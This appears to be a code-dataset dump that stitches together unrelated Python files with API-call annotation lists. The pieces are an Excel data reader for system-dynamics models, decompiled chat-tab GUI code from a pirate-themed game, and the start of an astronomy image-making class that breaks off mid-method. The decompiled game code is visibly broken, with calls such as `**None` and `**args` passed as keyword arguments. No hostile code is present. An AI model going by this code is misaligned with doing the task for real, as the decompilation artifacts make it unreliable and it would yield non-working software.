if data_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# Create only an xarray if the data is not 0 dimensional
if len(self.coords) > 0:
reshape_dims = tuple(utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
data = xr.DataArray(
data=data, coords=self.coords, dims=list(self.coords)
)
return data
def _get_constant_data(self, data_across, cell, shape):
"""
Function thar reads data from excel file for CONSTANT
Parameters
----------
data_across: "cell" or "name"
The way to read data file.
cell: int or str
If data_across is "cell" the lefttop split cell value where
the data is.
If data_across is "name" the cell range name where the data is.
shape:
The shape of the data in 2D.
Returns
-------
data: float/ndarray(1D/2D)
The values of the data.
"""
if data_across == "cell":
# read data from topleft cell name using pandas
start_row, start_col = cell
return self._get_data_from_file(
rows=[start_row, start_row + shape[0]],
cols=[start_col, start_col + shape[1]])
else:
# read data from cell range name using OpenPyXL
data = self._get_data_from_file_opyxl(cell)
try:
# Remove length=1 axis
data_shape = data.shape
if data_shape[1] == 1:
data = data[:, 0]
if data_shape[0] == 1:
data = data[0]
except AttributeError:
# Data is a float, nothing to do
pass
# Check data dims
try:
if shape[0] == 1 and shape[1] != 1:
assert shape[1] == len(data)
elif shape[0] != 1 and shape[1] == 1:
assert shape[0] == len(data)
elif shape[0] == 1 and shape[1] == 1:
assert isinstance(data, float)
else:
assert tuple(shape) == data.shape
except AssertionError:
raise ValueError(self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same shape as the"
+ " given coordinates")
return data
def __call__(self):
return self.data
class ExtSubscript(External):
"""
Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT
"""
def __init__(self, file_name, sheet, firstcell, lastcell, prefix, root):
super().__init__("Hardcoded external subscript")
self.file = file_name
self.sheet = sheet
self._resolve_file(root=root)
row_first, col_first = self._split_excel_cell(firstcell)
row_last, col_last = self._split_excel_cell(lastcell)
data = pd.read_excel(
self.file, sheet,
skiprows=row_first-1,
nrows=row_last-row_first+1,
usecols=np.arange(col_first, col_last+1)
)
self.subscript = [prefix + str(d) for d in data.values.flatten()]
| [
"numpy.all",
"re.compile",
"openpyxl.load_workbook",
"xarray.broadcast",
"os.path.join",
"os.path.splitext",
"numpy.diff",
"os.path.isfile",
"numpy.array",
"numpy.empty_like",
"numpy.isnan",
"pandas.to_numeric",
"pandas.read_excel",
"warnings.warn",
"numpy.interp",
"re.findall",
"numpy.arange"
]
| [((16001, 16015), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (16009, 16015), True, 'import numpy as np\n'), ((16902, 16931), 'numpy.empty_like', 'np.empty_like', (['x'], {'dtype': 'float'}), '(x, dtype=float)\n', (16915, 16931), True, 'import numpy as np\n'), ((19042, 19071), 're.findall', 're.findall', (['"""\\\\d+|\\\\D+"""', 'cell'], {}), "('\\\\d+|\\\\D+', cell)\n", (19052, 19071), False, 'import re\n'), ((1349, 1405), 'openpyxl.load_workbook', 'load_workbook', (['file_name'], {'read_only': '(True)', 'data_only': '(True)'}), '(file_name, read_only=True, data_only=True)\n', (1362, 1405), False, 'from openpyxl import load_workbook\n'), ((10559, 10592), 'os.path.join', 'os.path.join', (['root', 'self.file[1:]'], {}), '(root, self.file[1:])\n', (10571, 10592), False, 'import os\n'), ((10609, 10634), 'os.path.isfile', 'os.path.isfile', (['self.file'], {}), '(self.file)\n', (10623, 10634), False, 'import os\n'), ((26592, 26633), 'numpy.all', 'np.all', (["(x > data['lookup_dim'].values[-1])"], {}), "(x > data['lookup_dim'].values[-1])\n", (26598, 26633), True, 'import numpy as np\n'), ((30529, 30543), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (30537, 30543), True, 'import numpy as np\n'), ((10692, 10723), 'os.path.isfile', 'os.path.isfile', (['(self.file + ext)'], {}), '(self.file + ext)\n', (10706, 10723), False, 'import os\n'), ((12025, 12048), 'numpy.isnan', 'np.isnan', (['series[i - 1]'], {}), '(series[i - 1])\n', (12033, 12048), True, 'import numpy as np\n'), ((12600, 12616), 'numpy.isnan', 'np.isnan', (['series'], {}), '(series)\n', (12608, 12616), True, 'import numpy as np\n'), ((12674, 12690), 'numpy.isnan', 'np.isnan', (['series'], {}), '(series)\n', (12682, 12690), True, 'import numpy as np\n'), ((13977, 13991), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (13985, 13991), True, 'import numpy as np\n'), ((26664, 26689), 'xarray.broadcast', 'xr.broadcast', (['data[-1]', 'x'], {}), '(data[-1], x)\n', (26676, 26689), True, 'import xarray as xr\n'), ((26706, 26805), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')\n", (26719, 26805), False, 'import warnings\n'), ((26856, 26896), 'numpy.all', 'np.all', (["(x < data['lookup_dim'].values[0])"], {}), "(x < data['lookup_dim'].values[0])\n", (26862, 26896), True, 'import numpy as np\n'), ((34649, 34683), 'numpy.arange', 'np.arange', (['col_first', '(col_last + 1)'], {}), '(col_first, col_last + 1)\n', (34658, 34683), True, 'import numpy as np\n'), ((835, 869), 'pandas.to_numeric', 'pd.to_numeric', (['ex'], {'errors': '"""coerce"""'}), "(ex, errors='coerce')\n", (848, 869), True, 'import pandas as pd\n'), ((3158, 3185), 'os.path.splitext', 'os.path.splitext', (['self.file'], {}), '(self.file)\n', (3174, 3185), False, 'import os\n'), ((8183, 8203), 'numpy.array', 'np.array', (['[[series]]'], {}), '([[series]])\n', (8191, 8203), True, 'import numpy as np\n'), ((9144, 9162), 'numpy.array', 'np.array', (['[[data]]'], {}), '([[data]])\n', (9152, 9162), True, 'import numpy as np\n'), ((13609, 13624), 'numpy.diff', 'np.diff', (['series'], {}), '(series)\n', (13616, 13624), True, 'import numpy as np\n'), ((23945, 24042), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' + 'extrapolating data above the maximum value of the time'\n )"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the time')\n", (23958, 24042), False, 'import warnings\n'), ((26927, 26951), 'xarray.broadcast', 'xr.broadcast', (['data[0]', 'x'], {}), '(data[0], x)\n', (26939, 26951), True, 'import xarray as xr\n'), ((26968, 27067), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')\n", (26981, 27067), False, 'import warnings\n'), ((27145, 27166), 'xarray.broadcast', 'xr.broadcast', (['data', 'x'], {}), '(data, x)\n', (27157, 27166), True, 'import xarray as xr\n'), ((27713, 27812), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')\n", (27726, 27812), False, 'import warnings\n'), ((19272, 19296), 're.compile', 're.compile', (['"""[^a-zA-Z]+"""'], {}), "('[^a-zA-Z]+')\n", (19282, 19296), False, 'import re\n'), ((24165, 24262), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' + 'extrapolating data below the minimum value of the time'\n )"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the time')\n", (24178, 24262), False, 'import warnings\n'), ((27947, 28046), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')\n", (27960, 28046), False, 'import warnings\n'), ((912, 961), 'pandas.read_excel', 'pd.read_excel', (['file_name', 'sheet_name'], {'header': 'None'}), '(file_name, sheet_name, header=None)\n', (925, 961), True, 'import pandas as pd\n'), ((17386, 17410), 'numpy.interp', 'np.interp', (['value', 'xr', 'yr'], {}), '(value, xr, yr)\n', (17395, 17410), True, 'import numpy as np\n')] |
# File: C (Python 2.4)
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from direct.fsm.FSM import FSM
from direct.showbase.PythonUtil import Functor
from pandac.PandaModules import *
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui.TabBar import TopTab, TabBar
class ChatTab(TopTab):
def __init__(self, tabBar, name, text_xyz = None, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.22, 0.0, 0.10000000000000001), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None), ('label', '', None), ('textMayChange', 1, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **None)
self.initialiseoptions(ChatTab)
text_pos = (0.11700000000000001, 0.040000000000000001, 0)
if text_xyz:
text_pos = text_xyz
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.myLabel = DirectLabel(parent = self, relief = None, state = DGG.DISABLED, text = self['label'], text_scale = self.myTextScale, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = text_pos, text_font = PiratesGlobals.getInterfaceFont(), textMayChange = 1)
def destroy(self):
self.myLabel = None
TopTab.destroy(self)
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.myLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
class ChatTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.19500000000000001 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
return ChatTab(self, name, **None)
def stash(self):
TabBar.stash(self)
def setBoxWidth(self, percentage):
for key in self.tabs:
self.tabs[key].setBoxWidth(percentage)
class WhisperTab(TopTab):
def __init__(self, tabBar, name, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.745, 0.0, 0.11), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **None)
self.initialiseoptions(ChatTab)
class WhisperTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.71999999999999997 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
newWhisperTab = WhisperTab(self, name, **None)
if hasattr(self, 'percentage'):
newWhisperTab.setBoxWidth(self.percentage)
return newWhisperTab
class ChatBar(DirectFrame, FSM):
def __init__(self, parent, chatMgr, whiteListEntry, *args, **kw):
optiondefs = (('relief', None, None), ('state', DGG.DISABLED, None), ('frameSize', (0, 1, 0, 0.75), None), ('frameColor', (1, 0, 1, 0.20000000000000001), None))
self.defineoptions(kw, optiondefs)
DirectFrame.__init__(self, parent, *args, **args)
self.initialiseoptions(ChatBar)
FSM.__init__(self, 'ChatBar')
if base.config.GetBool('whitelist-chat-enabled', 1):
pass
self.whiteListEnabled = base.cr.accountDetailRecord.WLChatEnabled
self.openChatEnabled = base.cr.accountDetailRecord.canOpenChatAndNotGetBooted()
if not self.whiteListEnabled:
pass
self.noChat = not (self.openChatEnabled)
self.chatTabs = None
self.whisperTabs = None
self.chatMgr = chatMgr
self.slideIval = None
self.whisperNameLabel = None
self.whisperPrefixLabel = None
self.percentage = 1.0
self.iPercentage = 1.0
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.setupGui(whiteListEntry)
self.request('Hidden')
def destroy(self):
self.cleanup()
self.stopSlideIval()
DirectFrame.destroy(self)
self.cleanupGui()
self.chatMgr = None
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.setScale(percentage, 1.0, 1.0)
self.chatTabs.setBoxWidth(percentage)
self.speedButton.setScale(iPercentage, 1.0, 1.0)
self.emoteButton.setScale(iPercentage, 1.0, 1.0)
self.startChatButton.setScale(iPercentage, 1.0, 1.0)
self.percentage = percentage
self.iPercentage = iPercentage
if self.whisperNameLabel:
self.whisperNameLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
self.whisperNameLabel['text_pos'] = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0)
if self.whisperPrefixLabel:
self.whisperPrefixLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
def setupGui(self, whiteListEntry):
self.stopSlideIval()
if self.chatTabs:
self.chatTabs.destroy()
if self.whisperTabs:
self.whisperTabs.destroy()
self.removeChildren()
gui = loader.loadModel('models/gui/chat_frame_b')
skullbg = loader.loadModel('models/gui/chat_frame_a')
skullbg2 = loader.loadModel('models/gui/chat_frame_a')
skullgui = loader.loadModel('models/gui/chat_frame_skull')
emoteGfxbg = loader.loadModel('models/gui/chat_frame_a')
icons = loader.loadModel('models/gui/toplevel_gui')
charGui = loader.loadModel('models/gui/char_gui')
scale = Vec3(0.20000000000000001, 1.0, 0.20000000000000001)
offset = (0.5, 0, 0.38)
speedChatBg = self.attachNewNode('speedChatBg')
skullbg.find('**/pPlane11').reparentTo(speedChatBg)
speedChatBg.setScale(scale)
speedChatBg.setPos(*offset)
speedChatBg.flattenStrong()
emoteBg = self.attachNewNode('emoteBg')
skullbg2.find('**/pPlane11').reparentTo(emoteBg)
emoteBg.setScale(scale)
emoteBg.setPos(0.59099999999999997, 0, 0.38)
emoteBg.flattenStrong()
self.chatEntryBackground = self.attachNewNode('chatEntryBackground')
self.chatEntryBackground.setX(-0.90000000000000002)
self.backTabParent = self.chatEntryBackground.attachNewNode('backTabs')
textEntryGeom = self.chatEntryBackground.attachNewNode('textEntryBg')
gui.find('**/pPlane12').reparentTo(textEntryGeom)
textEntryGeom.setScale(scale)
textEntryGeom.setPos(*offset)
textEntryGeom.flattenStrong()
self.chatEntryVisNode = textEntryGeom.attachNewNode('chatEntryVis')
self.chatEntryVisNode.hide()
self.chatEntryVisNode.setAlphaScale(0)
whiteListEntry.reparentTo(self.chatEntryVisNode)
if self.noChat:
def noshow():
pass
whiteListEntry.show = noshow
whiteListEntry.hide()
else:
whiteListEntry.setPos(0.20000000000000001, 0, 0.035999999999999997)
self.frontTabParent = self.chatEntryBackground.attachNewNode('frontTab', sort = 2)
self.speedButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon_over')), geom_scale = 0.25, pos = (0.14000000000000001, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateSpeedChat)
self.emoteButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (charGui.find('**/*head'), charGui.find('**/*head'), charGui.find('**/*head_over')), geom_scale = 0.29999999999999999, pos = (0.049000000000000002, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateEmoteChat)
tGui = loader.loadModel('models/gui/triangle')
triangle = (tGui.find('**/triangle'), tGui.find('**/triangle_down'), tGui.find('**/triangle_over'))
self.startChatButton = DirectButton(parent = self, relief = None, image = triangle, image_scale = 0.065000000000000002, pos = (0.23100000000000001, 0.0, 0.050000000000000003), rolloverSound = None, command = self.chatMgr.activateChat)
self.chatTabs = ChatTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
allTab = self.chatTabs.addTab('All', label = PLocalizer.ChatTabAll, command = self.chatMgr.activateChat, extraArgs = [
'All'])
crewTab = self.chatTabs.addTab('Crew', label = PLocalizer.ChatTabCrew, command = self.chatMgr.activateChat, extraArgs = [
'Crew'])
guildTab = self.chatTabs.addTab('Guild', label = PLocalizer.ChatTabGuild, command = self.chatMgr.activateChat, extraArgs = [
'Guild'])
shipPVPTab = self.chatTabs.addTab('ShipPVP', label = PLocalizer.ChatTabShipPVP, command = self.chatMgr.activateChat, frameSize = (0, 0.23999999999999999, 0.0, 0.10000000000000001), textMayChange = 1, extraArgs = [
'ShipPVP'])
self.chatTabs.stash()
self.whisperTabs = WhisperTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
whisperNameTab = self.whisperTabs.addTab('Name')
whisperCancelTab = self.whisperTabs.addTab('Cancel', command = self.whisperCanceled)
self.whisperTabs.stash()
whisperCancelTab['frameSize'] = (0, 0.105, 0.0, 0.11)
self.whisperPrefixLabel = DirectLabel(parent = whisperNameTab, relief = None, state = DGG.DISABLED, text = PLocalizer.ProfilePageWhisper + ':', text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.033000000000000002, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
DirectLabel(parent = whisperCancelTab, relief = None, state = DGG.DISABLED, text = 'X', text_scale = (self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999), text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.052999999999999999, 0.042999999999999997, 0), text_font = PiratesGlobals.getInterfaceFont())
self.whisperTabs.stash()
self.request('Hidden')
def cleanupGui(self):
self.whisperPrefixLabel = None
self.chatEntryBackground = None
self.backTabParent = None
self.frontTabParent = None
self.speedButton = None
self.emoteButton = None
self.startChatButton = None
if self.chatTabs:
self.chatTabs.destroy()
self.chatTabs = None
if self.whisperTabs:
self.whisperTabs.destroy()
self.whisperTabs = None
def whisperCanceled(self):
self.chatMgr.whisperCanceled()
def refreshTabStates(self):
if self.getCurrentOrNextState() not in ('Off', 'Hidden', 'Whisper'):
if not self.chatMgr.crewChatAllowed:
self.chatTabs.getTab('Crew').stash()
else:
self.chatTabs.getTab('Crew').unstash()
if not self.chatMgr.guildChatAllowed:
self.chatTabs.getTab('Guild').stash()
else:
self.chatTabs.getTab('Guild').unstash()
if not self.chatMgr.shipPVPChatAllowed:
self.chatTabs.getTab('ShipPVP').stash()
else:
self.chatTabs.getTab('ShipPVP').unstash()
def stopSlideIval(self):
if self.slideIval and self.slideIval.isPlaying():
self.slideIval.pause()
def enterHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.setAlphaScale, 0), Func(self.chatEntryVisNode.hide), self.chatEntryBackground.posInterval(0.25, Point3(-0.90000000000000002, 0, 0), blendType = 'easeIn'), Func(self.startChatButton.show), Func(self.chatEntryBackground.hide))
self.slideIval.start()
def exitHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.show), Func(self.chatEntryBackground.show), Func(self.startChatButton.hide), self.chatEntryBackground.posInterval(0.25, Point3(0, 0, 0), blendType = 'easeOut'), Func(self.chatEntryVisNode.setAlphaScale, 1))
self.slideIval.start()
def enterAll(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('All')
self.refreshTabStates()
def exitAll(self):
pass
def enterCrew(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Crew')
self.refreshTabStates()
def exitCrew(self):
pass
def enterGuild(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Guild')
self.refreshTabStates()
def enterShipPVP(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('ShipPVP')
self.refreshTabStates()
def exitShipPVP(self):
pass
def exitGuild(self):
pass
def enterWhisper(self, avatarName = '<NAME>', whisperId = 0):
self.whisperName = avatarName
self.whisperId = whisperId
self.chatTabs.stash()
self.whisperTabs.unstash()
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
self.whisperNameLabel = DirectLabel(parent = self.whisperTabs.getTab('Name'), relief = None, state = DGG.DISABLED, text = avatarName, text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
def exitWhisper(self):
self.whisperName = ''
self.whisperId = 0
if self.whisperNameLabel and 0:
self.whisperNameLabel.destroy()
self.whisperNameLabel = None
| [
"direct.fsm.FSM.FSM.__init__",
"pirates.piratesgui.TabBar.TabBar.stash",
"pirates.piratesbase.PiratesGlobals.getInterfaceFont",
"pirates.piratesgui.TabBar.TopTab.__init__",
"pirates.piratesgui.TabBar.TopTab.destroy"
]
| [((803, 846), 'pirates.piratesgui.TabBar.TopTab.__init__', 'TopTab.__init__', (['self', 'tabBar', 'name'], {}), '(self, tabBar, name, **None)\n', (818, 846), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((1500, 1520), 'pirates.piratesgui.TabBar.TopTab.destroy', 'TopTab.destroy', (['self'], {}), '(self)\n', (1514, 1520), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((2557, 2575), 'pirates.piratesgui.TabBar.TabBar.stash', 'TabBar.stash', (['self'], {}), '(self)\n', (2569, 2575), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((3031, 3074), 'pirates.piratesgui.TabBar.TopTab.__init__', 'TopTab.__init__', (['self', 'tabBar', 'name'], {}), '(self, tabBar, name, **None)\n', (3046, 3074), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((4503, 4532), 'direct.fsm.FSM.FSM.__init__', 'FSM.__init__', (['self', '"""ChatBar"""'], {}), "(self, 'ChatBar')\n", (4515, 4532), False, 'from direct.fsm.FSM import FSM\n'), ((1381, 1414), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (1412, 1414), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((11416, 11449), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (11447, 11449), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((11863, 11896), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (11894, 11896), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((15652, 15685), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (15683, 15685), False, 'from pirates.piratesbase import PiratesGlobals\n')] |
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.misc.fluxes Contains the ObservedImageMaker class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.units import Unit
from astropy import constants
# Import the relevant PTS classes and modules
from ..tools.logging import log
from ..tools import filesystem as fs
from ..basics.filter import Filter
from ...magic.core.image import Image
from ...magic.core.frame import Frame
from ...magic.basics.coordinatesystem import CoordinateSystem
from ..tools.special import remote_filter_convolution, remote_convolution_frame
# -----------------------------------------------------------------
# The speed of light
speed_of_light = constants.c
# -----------------------------------------------------------------
class ObservedImageMaker(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(ObservedImageMaker, self).__init__()
# -- Attributes --
# The simulation prefix
self.simulation_prefix = None
# The paths to the 'total' FITS files produced by SKIRT
self.fits_paths = None
# The wavelengths of the simulation
self.wavelengths = None
# Filter names
self.filter_names = ["FUV", "NUV", "u", "g", "r", "i", "z", "H", "J", "Ks", "I1", "I2", "I3", "I4", "W1", "W2",
"W3", "W4", "Pacs 70", "Pacs 100", "Pacs 160", "SPIRE 250", "SPIRE 350", "SPIRE 500"]
# The instrument names
self.instrument_names = None
# The filters for which the images should be created
self.filters = dict()
# The dictionary containing the images for various SKIRT output datacubes
self.images = dict()
# The reference WCS
self.wcs = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None, filter_names=None, instrument_names=None, wcs_path=None, kernel_paths=None, unit=None, host_id=None):
"""
This function ...
:param simulation:
:param output_path:
:param filter_names:
:param instrument_names:
:param wcs_path:
:param kernel_paths:
:param unit:
:param host_id:
:return:
"""
# Obtain the paths to the 'total' FITS files created by the simulation
self.fits_paths = simulation.totalfitspaths()
# Get the list of wavelengths for the simulation
self.wavelengths = simulation.wavelengths()
# Get the simulation prefix
self.simulation_prefix = simulation.prefix()
# Set the filter names
if filter_names is not None: self.filter_names = filter_names
# Set the instrument names
self.instrument_names = instrument_names
# Create the filters
self.create_filters()
# Make the observed images
self.make_images(host_id)
# Set the WCS of the created images
if wcs_path is not None: self.set_wcs(wcs_path)
# Convolve the image with a given convolution kernel
if kernel_paths is not None:
# Check whether the WCS for the image is defined. If not, show a warning and skip the convolution
if wcs_path is None: log.warning("WCS of the image is not defined, so convolution cannot be performed (the pixelscale is undefined)")
else: self.convolve(kernel_paths, host_id)
# Convert the units (WCS has to be loaded!)
if unit is not None: self.convert_units(unit)
# Write the results
if output_path is not None: self.write(output_path)
# -----------------------------------------------------------------
def create_filters(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing the filter objects ...")
# Loop over the different filter names
for filter_name in self.filter_names:
# Debugging
log.debug("Constructing the " + filter_name + " filter ...")
# Create the filter
fltr = Filter.from_string(filter_name)
# Add the filter to the list
self.filters[filter_name] = fltr
# -----------------------------------------------------------------
def make_images(self, host_id=None):
"""
This function ...
:param host_id:
:return:
"""
# Inform the user
log.info("Making the observed images (this may take a while) ...")
# Loop over the different simulated images
for path in self.fits_paths:
# Get the name of the instrument
instr_name = instrument_name(path, self.simulation_prefix)
# If a list of instruments is defined an this instrument is not in this list, skip it
if self.instrument_names is not None and instr_name not in self.instrument_names: continue
# Get the name of the datacube (as given by SKIRT)
datacube_name = fs.strip_extension(fs.name(path))
# Debugging
log.debug("Making the observed images for " + datacube_name + ".fits ...")
# Create a dictionary to contain the observed images for this FITS file
images = dict()
# The filter convolution is performed remotely
if host_id is not None:
# Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names)
frames = remote_filter_convolution(host_id, path, self.wavelengths, self.filters)
# Add the resulting image frames to the dictionary
for filter_name in frames:
# Add the observed image to the dictionary
images[filter_name] = frames[filter_name]
# The calculation is performed locally
else:
# Load the simulated image
datacube = Image.from_file(path, always_call_first_primary=False)
# Convert the frames from neutral surface brightness to wavelength surface brightness
for l in range(len(self.wavelengths)):
# Get the wavelength
wavelength = self.wavelengths[l]
# Determine the name of the frame in the datacube
frame_name = "frame" + str(l)
# Divide this frame by the wavelength in micron
datacube.frames[frame_name] /= wavelength
# Set the new unit
datacube.frames[frame_name].unit = "W / (m2 * arcsec2 * micron)"
# Convert the datacube to a numpy array where wavelength is the third dimension
fluxdensities = datacube.asarray()
# Loop over the different filters
for filter_name in self.filters:
fltr = self.filters[filter_name]
# Debugging
log.debug("Making the observed image for the " + str(fltr) + " filter ...")
# Calculate the observed image frame
data = fltr.convolve(self.wavelengths, fluxdensities)
frame = Frame(data)
# Set the unit of the frame
frame.unit = "W/(m2 * arcsec2 * micron)"
# Add the observed image to the dictionary
images[filter_name] = frame
# Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key)
self.images[datacube_name] = images
# -----------------------------------------------------------------
def set_wcs(self, wcs_path):
"""
This function ...
:param wcs_path:
:return:
"""
# TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images)
# Inform the user
log.info("Setting the WCS of the simulated images ...")
# Debugging
log.debug("Loading the coordinate system from '" + wcs_path + "' ...")
# Load the WCS
self.wcs = CoordinateSystem.from_file(wcs_path)
# Loop over the different images and set the WCS
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Setting the coordinate system of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Set the coordinate system for this frame
self.images[datacube_name][filter_name].wcs = self.wcs
# -----------------------------------------------------------------
def convolve(self, kernel_paths, host_id=None):
"""
This function ...
:param kernel_paths:
:param host_id:
:return:
"""
# Inform the user
log.info("Convolving the images ...")
# If the convolutions must be performed remotely
if host_id is not None:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Determine the kernel path for this image
kernel_path = kernel_paths[filter_name]
# Perform the remote convolution
